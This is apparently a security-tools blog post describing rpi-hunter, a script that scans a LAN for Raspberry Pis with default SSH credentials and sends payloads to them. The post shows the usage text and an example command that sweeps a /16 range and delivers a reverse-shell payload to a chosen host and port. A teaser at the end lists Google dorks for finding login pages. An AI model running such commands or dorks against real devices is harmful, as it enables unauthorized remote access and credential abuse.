rpi hunter is useful when there are multiple Raspberry Pi’s on your LAN with default or known credentials, in order to automate sending commands/payloads to them.
Also Read – VSHG : A Standalone Addon for GnuPG
Installation
Usage
usage: rpi-hunter.py [-h] [–list] [–no-scan] [-r IP_RANGE] [-f IP_LIST]
[-c CREDS] [–payload PAYLOAD] [-H HOST] [-P PORT]
[–safe] [-q]
optional arguments:
-h, –help show this help message and exit
–list List available payloads
–no-scan Disable ARP scanning
-r IP_RANGE IP range to scan
-f IP_LIST IP list to use (Default ./scan/RPI_list)
-u UNAME Username to use when ssh’ing
-c CREDS Password to use when ssh’ing
–payload PAYLOAD (Name of, or raw) Payload [ex. reverse_shell or ‘whoami’]
-H HOST (If using reverse_shell payload) Host for reverse shell
-P PORT (If using reverse_shell payload) Port for reverse shell
–safe Print sshpass command, but don’t execute it
-q Don’t print banner
Example usage: ./rpi-hunter.py -r 192.168.0.0/16 –payload reverse_shell -H 127.0.0.1 -P 1337
Run ./rpi-hunter.py –list to see avalible payloads.
Payloads can be specified by the payload name from –list or as raw input
ex. –payload reverse_shell or –payload [your cli command here]
Disclaimer
The standard internet fun disclaimer applies. Don’t commit crimes, be responsible.I am in no way responsible for anything and everything you do with rpi-hunter.
This repo contains all variants of information security & Bug bounty & Penetration Testing write-up…
site:*/sign-in site:*/account/login site:*/forum/ucp.php?mode=login inurl:memberlist.php?mode=viewprofile intitle:"EdgeOS" intext:"Please login" inurl:user_login.php intitle:"Web Management Login" site:*/users/login_form site:*/access/unauthenticated site:account.*.*/login site:admin.*.com/signin/…
Matrix is an open network for secure and decentralized communication. Users from every Matrix homeserver…
Linux Security And Monitoring Scripts are a collection of security and monitoring scripts you can…
A fiber is a unit of execution that must be manually scheduled by the application…
XSS Exploitation Tool is a penetration testing tool that focuses on the exploit of Cross-Site…